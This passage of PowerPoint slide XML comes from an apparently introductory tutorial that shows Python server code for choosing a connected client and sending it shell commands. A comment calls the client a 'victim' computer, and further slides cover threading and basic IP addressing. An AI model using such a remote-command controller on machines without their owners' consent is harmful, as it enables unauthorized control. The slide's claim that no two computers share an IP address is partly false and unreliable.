              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>][1]) + "\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    print("--------------Clients----------------"+"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>n"+results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1520425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E0BA-5426-4B71-B24F-DA825927DCC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="487131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Selecting Target Connection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4329F9A8-F740-48AE-ACDC-7BE4FA8436B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041276" y="1582340"/>
            <a:ext cx="10109447" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#selecting the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>get_target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        target = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>cmd.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>('select ','') #target =id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#since id is in string format so convert to int</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        target = int(target)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        conn = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>[target]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        print("You are now connected to :"+ str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>[target][0]))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        print(str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>[target][0]) + "&gt;",end="") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#prints IP address of client like # 192.168.0.4&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        return conn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    except:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        print("Selection not Valid !")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        return None</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3929873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1404-0736-4980-BEE1-29020E9E6DD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="380599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sending Commands to Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3CFCB7D-932F-4CD5-9712-58C9BF1F0E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774577" y="988700"/>
            <a:ext cx="10952826" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Sending Commands to client/victim/friend computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>send_target_commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(conn):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    # to send more than one command use infinite while loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    while True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = input()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            # to stop the infinite loop, we need to quit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> == "quit":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                break</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            # to convert any command entered in string format to byte format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>str.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>)) &gt; 0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>conn.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>str.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>))  # to send commands to another computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>client_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> = str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>conn.recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(20480),"utf-8")  # whenever data is received from client back, it has to be converted from byte to string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>                print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>client_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>, end="")  # here end parameter gets the cursor to next line after giving output.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        except:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            print("Error sending Commands.") #if client system is off then no more commands will be sent to it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            break</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="753767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104B-E654-4990-874D-D5AAA12E10CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4131816" y="393083"/>
            <a:ext cx="3245528" cy="575908"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thread Flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AE835B0-AA3B-4307-B3CE-3A3A49DF6022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473846" y="1162975"/>
            <a:ext cx="11244308" cy="5695025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create worker Threads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a ‘for’ loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create threads using  t= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>threading.Thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>t.daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=True (i.e. thread should release the memory after program ends)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start the thread using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>t.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store jobs in QUEUE because threads look for jobs in a queue and not in lists.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a work function and get the queue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the job number in queue is 1 then handle connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the job number in queue is 2 then send the commands.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3126580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56EE-6D8B-49B2-B1E5-F3EB93C4BAA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="2029287" cy="433865"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DBD3848-2B93-438F-9A94-8DEB7D2F01BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1287262"/>
            <a:ext cx="4053396" cy="506027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>First Run server.py file</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9331C7D-880E-43F6-ADF6-507ADD3F4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616" y="2744881"/>
            <a:ext cx="4874524" cy="2329591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{791D244F-2576-4F0F-8116-0937C298522F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1709834"/>
            <a:ext cx="3858087" cy="81142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Then Run client.py file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Output :</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="807184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B28F-7A0F-4ADE-B12F-26B3D4C0BE9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616258" y="522380"/>
            <a:ext cx="10515600" cy="433865"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basics of Networking – IP address</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C16FC559-1414-439F-ADE8-610E540066AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550416" y="1303877"/>
            <a:ext cx="10830017" cy="5306951"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>You can think of IP addresses as address of your computer or a device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If you are having a device of way of connecting to internet, then it definitely has IP address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The word ‘IP’ stands for Internet Protocol.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Just like as you staying in the house, it has address, so if anyone wants to mail or send something to you, they will need your address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Similarly, when a computer has to communicate or send the message to another computer, it needs an address, and that address is known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>IP address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>According to google, IP address is just a unique string of numbers separated by full stops that identifies each computer using the internet protocol to communicate over a network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The numbers in the string can range from 0-255.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>No two computers can have the same IP address  because they all are unique.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2006465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C903D-DA47-4D08-B914-14B40FCAAB3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365126"/>
            <a:ext cx="10515600" cy="478254"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55903AE9-0404-455B-AE24-754E24B73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354" y="1188868"/>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84D2FCE-1BB3-4803-9DA4-17394BCAA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4300" y="1188868"/>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DAB7DE-4236-4A8F-9F0D-30E3026649C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139300" y="1917576"/>
            <a:ext cx="999441" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Device-1</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C31DDE48-6F2F-4B00-AD64-3992F3E253FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9333779" y="1951321"/>
            <a:ext cx="1009059" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
